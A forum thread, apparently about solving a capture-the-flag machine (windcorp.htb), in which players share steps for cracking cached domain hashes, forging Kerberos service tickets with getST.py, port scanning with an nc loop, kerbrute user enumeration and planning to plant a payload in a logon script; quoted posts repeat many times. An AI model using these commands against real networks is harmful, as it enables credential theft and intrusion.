Question still remains... how to access windows box which is hosting this linux webserver container...
Still searching around. Final flag is on windows.

(September 15, 2022, 07:33 PM)Hacker2222 Wrote:

(September 15, 2022, 05:39 AM)meowmeowattack Wrote: not sure what to proceed next

after inspecting the ldb file, where you can find the domain sid, a domain user and the credential hash

var/lib/sss/db/cache_windcorp.htb.ldb

the credential hash can be john'd to reveal the password of the domain user
from there, can also do impersonation to get a Administrator.ccache

but the thing is, from the dns zone transfer and other info found, there are only two hosts found in the domain, webserver and hope. and none of them has any of the smb, ldap ports open. i start to wonder where to proceed next.

it is curious though, which host is serving the ssh port, it's nowhere to be found yet.


Edit: found new hosts by cracking the known_hosts file.

i think u can use password of ray.duncan to lgoin with ssh ? container has kinit &u can login using kinit ray.duncan then ssh -k to login ? ssh login as ray.duncan does not work tho .......

(September 16, 2022, 08:38 AM)onl1_f4ns Wrote: Question still remains... how to access windows box which is hosting this linux webserver container...
Still searching around. Final flag is on windows.

you can request a silver ticket as ray.duncan and access the smb share
there is a share folder where you'll find a number of debug users
i'm trying to figure out what's the logical next step with those debug users

# request ticket
> getST.py -dc-ip 192.168.0.2 -spn cifs/hope.windcorp.htb 'windcorp.htb/ray.duncan:passs'
> export KRB5CCNAME=ray.duncan.ccache
> proxychains smbclient.py [email protected] -k -no-pass

(September 16, 2022, 09:13 AM)meowmeowattack Wrote:

(September 15, 2022, 07:33 PM)Hacker2222 Wrote:

(September 15, 2022, 05:39 AM)meowmeowattack Wrote: not sure what to proceed next

after inspecting the ldb file, where you can find the domain sid, a domain user and the credential hash

var/lib/sss/db/cache_windcorp.htb.ldb

the credential hash can be john'd to reveal the password of the domain user
from there, can also do impersonation to get a Administrator.ccache

but the thing is, from the dns zone transfer and other info found, there are only two hosts found in the domain, webserver and hope. and none of them has any of the smb, ldap ports open. i start to wonder where to proceed next.

it is curious though, which host is serving the ssh port, it's nowhere to be found yet.


Edit: found new hosts by cracking the known_hosts file.

i think u can use password of ray.duncan to lgoin with ssh ? container has kinit &u can login using kinit ray.duncan then ssh -k to login ? ssh login as ray.duncan does not work tho .......

(September 16, 2022, 08:38 AM)onl1_f4ns Wrote: Question still remains... how to access windows box which is hosting this linux webserver container...
Still searching around. Final flag is on windows.

you can request a silver ticket as rayn.duncan and access the smb share
there is a share folder where you'll find a number of debug users
i'm trying to figure out what's the logical next step with those debug users

# request ticket
> getST.py -dc-ip 192.168.0.2 -spn cifs/hope.windcorp.htb 'windcorp.htb/rayn.duncan:passs'
> export KRB5CCNAME=rayn.duncan.ccache
> proxychains smbclient.py [email protected] -k -no-pass

Also looking around... and it is better to not share any creds in plain text please.
Most people won't even try this box. They are waiting for a readily available write-up..

(September 15, 2022, 07:33 PM)Hacker2222 Wrote:

(September 15, 2022, 05:39 AM)meowmeowattack Wrote: not sure what to proceed next

after inspecting the ldb file, where you can find the domain sid, a domain user and the credential hash

var/lib/sss/db/cache_windcorp.htb.ldb

the credential hash can be john'd to reveal the password of the domain user
from there, can also do impersonation to get a Administrator.ccache

but the thing is, from the dns zone transfer and other info found, there are only two hosts found in the domain, webserver and hope. and none of them has any of the smb, ldap ports open. i start to wonder where to proceed next.

it is curious though, which host is serving the ssh port, it's nowhere to be found yet.


Edit: found new hosts by cracking the known_hosts file.

i think u can use password of ray.duncan to lgoin with ssh ? container has kinit &u can login using kinit ray.duncan then ssh -k to login ? ssh login as ray.duncan does not work tho .......

(September 16, 2022, 11:00 AM)onl1_f4ns Wrote:

(September 16, 2022, 09:13 AM)meowmeowattack Wrote:

(September 15, 2022, 07:33 PM)Hacker2222 Wrote:

(September 15, 2022, 05:39 AM)meowmeowattack Wrote: not sure what to proceed next

after inspecting the ldb file, where you can find the domain sid, a domain user and the credential hash

var/lib/sss/db/cache_windcorp.htb.ldb

the credential hash can be john'd to reveal the password of the domain user
from there, can also do impersonation to get a Administrator.ccache

but the thing is, from the dns zone transfer and other info found, there are only two hosts found in the domain, webserver and hope. and none of them has any of the smb, ldap ports open. i start to wonder where to proceed next.

it is curious though, which host is serving the ssh port, it's nowhere to be found yet.


Edit: found new hosts by cracking the known_hosts file.

i think u can use password of ray.duncan to lgoin with ssh ? container has kinit &u can login using kinit ray.duncan then ssh -k to login ? ssh login as ray.duncan does not work tho .......

(September 16, 2022, 08:38 AM)onl1_f4ns Wrote: Question still remains... how to access windows box which is hosting this linux webserver container...
Still searching around. Final flag is on windows.

you can request a silver ticket as rayn.duncan and access the smb share
there is a share folder where you'll find a number of debug users
i'm trying to figure out what's the logical next step with those debug users

# request ticket
> getST.py -dc-ip 192.168.0.2 -spn cifs/hope.windcorp.htb 'windcorp.htb/rayn.duncan:passs'
> export KRB5CCNAME=rayn.duncan.ccache
> proxychains smbclient.py [email protected] -k -no-pass

Also looking around... and it is better to not share any creds in plain text please.
Most people won't even try this box. They are waiting for a readily available write-up..

oh, missed that, removed now

further digging found a krb5.keytab file, and can get the ntlm hash for webserver$, but since ntlm is disabled on the DC, i can't think of much to do here.
there is a wsman (5985) running on the DC, i'm aware of an exploit targeting this. but the endpoint seems to require auth

HTTP/1.1 401 
Server: Microsoft-HTTPAPI/2.0
WWW-Authenticate: Negotiate
WWW-Authenticate: Kerberos
Date: Fri, 16 Sep 2022 11:06:45 GMT
Connection: close
Content-Length: 0

in one of shares found this:[code]# cat Shortcuts.xml[/code]and this:[code]# lsdrw-rw-rw- 0 Mon May 2 02:11:24 2022 .drw-rw-rw- 0 Mon Apr 25 14:59:55 2022 ..drw-rw-rw- 0 Sun May 1 07:20:07 2022 {176474A3-B14C-4258-AA1D-14B9A9CC6BB8}drw-rw-rw- 0 Mon Apr 25 14:58:44 2022 {31B2F340-016D-11D2-945F-00C04FB984F9}drw-rw-rw- 0 Sun May 1 08:14:40 2022 {39A80DAA-D083-4C62-B751-C9049DFAECF0}drw-rw-rw- 0 Mon May 2 02:11:24 2022 {49AEF240-0D5C-4E3F-A511-1D72BF02AE83}drw-rw-rw- 0 Tue Apr 26 14:16:21 2022 {4C9B273B-C7BA-4F39-BECC-10C8C39D7092}drw-rw-rw- 0 Mon May 2 01:30:29 2022 {588D7984-374C-4F19-A96A-AE50B9E43BD0}drw-rw-rw- 0 Mon Apr 25 14:58:44 2022 {6AC1786C-016F-11D2-945F-00C04fB984F9}# cd ..# lsdrw-rw-rw- 0 Mon Apr 25 14:59:55 2022 .drw-rw-rw- 0 Thu Apr 28 13:58:26 2022 ..drw-rw-rw- 0 Wed Sep 14 13:03:31 2022 DfsrPrivatedrw-rw-rw- 0 Mon May 2 02:11:24 2022 Policiesdrw-rw-rw- 0 Mon May 2 01:49:18 2022 scripts# cd scripts# lsdrw-rw-rw- 0 Mon May 2 01:49:18 2022 .drw-rw-rw- 0 Mon Apr 25 14:59:55 2022 ..-rw-rw-rw- 2124 Mon May 2 00:47:14 2022 form.ps1-rw-rw-rw- 2710 Mon May 2 01:49:18 2022 Update phone.lnk-rw-rw-rw- 47774 Sun May 1 15:45:21 2022 windcorp-logo.png# pwd\windcorp.htb\scripts#[/code]So, if we can write and modify this form.ps1 script to include our payload and then trigger somehow Update phone.lnk (or some other ways)... we may potentially get rce on the windows box finally.Just trying..

(September 16, 2022, 11:16 AM)meowmeowattack Wrote: oh, missed that, removed now

further digging found a krb5.keytab file, and can get the ntlm hash for webserver$, but since ntlm is disabled on the DC, i can't think of much to do here.
there is a wsman (5985) running on the DC, i'm aware of an exploit targeting this. but the endpoint seems to require auth

HTTP/1.1 401 
Server: Microsoft-HTTPAPI/2.0
WWW-Authenticate: Negotiate
WWW-Authenticate: Kerberos
Date: Fri, 16 Sep 2022 11:06:45 GMT
Connection: close
Content-Length: 0

where did you found (5985) ?? I don't see it.

Nmap scan report for hope.windcorp.htb (192.168.0.2)
Host is up (0.00051s latency).
Not shown: 990 filtered ports
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
53/tcp   open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp   open  http          nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: 403 Forbidden
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-09-16 17:19:03Z)
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: windcorp.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: windcorp.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=9/16%Time=6324B00C%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
MAC Address: 00:15:5D:10:93:01 (Microsoft)
Service Info: Host: HOPE; OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-09-16T17:21:23
|_  start_date: N/A

(September 15, 2022, 07:33 PM)Hacker2222 Wrote:

(September 15, 2022, 05:39 AM)meowmeowattack Wrote: not sure what to proceed next

after inspecting the ldb file, where you can find the domain sid, a domain user and the credential hash

var/lib/sss/db/cache_windcorp.htb.ldb

the credential hash can be john'd to reveal the password of the domain user
from there, can also do impersonation to get a Administrator.ccache

but the thing is, from the dns zone transfer and other info found, there are only two hosts found in the domain, webserver and hope. and none of them has any of the smb, ldap ports open. i start to wonder where to proceed next.

it is curious though, which host is serving the ssh port, it's nowhere to be found yet.


Edit: found new hosts by cracking the known_hosts file.

i think u can use password of ray.duncan to lgoin with ssh ? container has kinit &u can login using kinit ray.duncan then ssh -k to login ? ssh login as ray.duncan does not work tho .......

(September 16, 2022, 05:43 PM)onl1_f4ns Wrote:

(September 16, 2022, 11:16 AM)meowmeowattack Wrote: oh, missed that, removed now

further digging found a krb5.keytab file, and can get the ntlm hash for webserver$, but since ntlm is disabled on the DC, i can't think of much to do here.
there is a wsman (5985) running on the DC, i'm aware of an exploit targeting this. but the endpoint seems to require auth

HTTP/1.1 401 
Server: Microsoft-HTTPAPI/2.0
WWW-Authenticate: Negotiate
WWW-Authenticate: Kerberos
Date: Fri, 16 Sep 2022 11:06:45 GMT
Connection: close
Content-Length: 0

where did you found (5985) ?? I don't see it.

Nmap scan report for hope.windcorp.htb (192.168.0.2)
Host is up (0.00051s latency).
Not shown: 990 filtered ports
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
53/tcp   open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp   open  http          nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: 403 Forbidden
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-09-16 17:19:03Z)
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: windcorp.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: windcorp.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=9/16%Time=6324B00C%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
MAC Address: 00:15:5D:10:93:01 (Microsoft)
Service Info: Host: HOPE; OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-09-16T17:21:23
|_  start_date: N/A

i didn't use nmap, instead i used a self written bash oneliner that utilises nc -w 1 -z to do port scanning. this is handy on the pivot when namp proxying isn't working as intended.

for p in {1..65535}; do nc -vn 192.168.0.2 $p -w 1 -z & done 2> output.txt

i also saw the form and the lnk file, but the shares are not writable, hence i didn't think any further in that direction.

verified with kerbrute that all users from debug-users.txt legit on the box.
Will try to brute their passwords... maybe I'll get a hit.

(September 15, 2022, 07:33 PM)Hacker2222 Wrote:

(September 15, 2022, 05:39 AM)meowmeowattack Wrote: not sure what to proceed next

after inspecting the ldb file, where you can find the domain sid, a domain user and the credential hash

var/lib/sss/db/cache_windcorp.htb.ldb

the credential hash can be john'd to reveal the password of the domain user
from there, can also do impersonation to get a Administrator.ccache

but the thing is, from the dns zone transfer and other info found, there are only two hosts found in the domain, webserver and hope. and none of them has any of the smb, ldap ports open. i start to wonder where to proceed next.

it is curious though, which host is serving the ssh port, it's nowhere to be found yet.


Edit: found new hosts by cracking the known_hosts file.

i think u can use password of ray.duncan to lgoin with ssh ? container has kinit &u can login using kinit ray.duncan then ssh -k to login ? ssh login as ray.duncan does not work tho .......

(September 16, 2022, 08:32 PM)onl1_f4ns Wrote: verified with kerbrute that all users from debug-users.txt legit on the box.
Will try to brute their passwords... maybe I'll get a hit.

don't bruteforce, account lock out enforced!

(September 15, 2022, 07:33 PM)Hacker2222 Wrote:

(September 15, 2022, 05:39 AM)meowmeowattack Wrote: not sure what to proceed next

after inspecting the ldb file, where you can find the domain sid, a domain user and the credential hash

var/lib/sss/db/cache_windcorp.htb.ldb

the credential hash can be john'd to reveal the password of the domain user
from there, can also do impersonation to get a Administrator.ccache

but the thing is, from the dns zone transfer and other info found, there are only two hosts found in the domain, webserver and hope. and none of them has any of the smb, ldap ports open. i start to wonder where to proceed next.

it is curious though, which host is serving the ssh port, it's nowhere to be found yet.


Edit: found new hosts by cracking the known_hosts file.

i think u can use password of ray.duncan to lgoin with ssh ? container has kinit &u can login using kinit ray.duncan then ssh -k to login ? ssh login as ray.duncan does not work tho .......

(September 16, 2022, 08:56 PM)Hacker2222 Wrote: ldap search on box ......... maybe useful ?

were you able to bypass the ssl issue?

"The server requires binds to turn on integrity checking if SSL\TLS are not already active on the connection"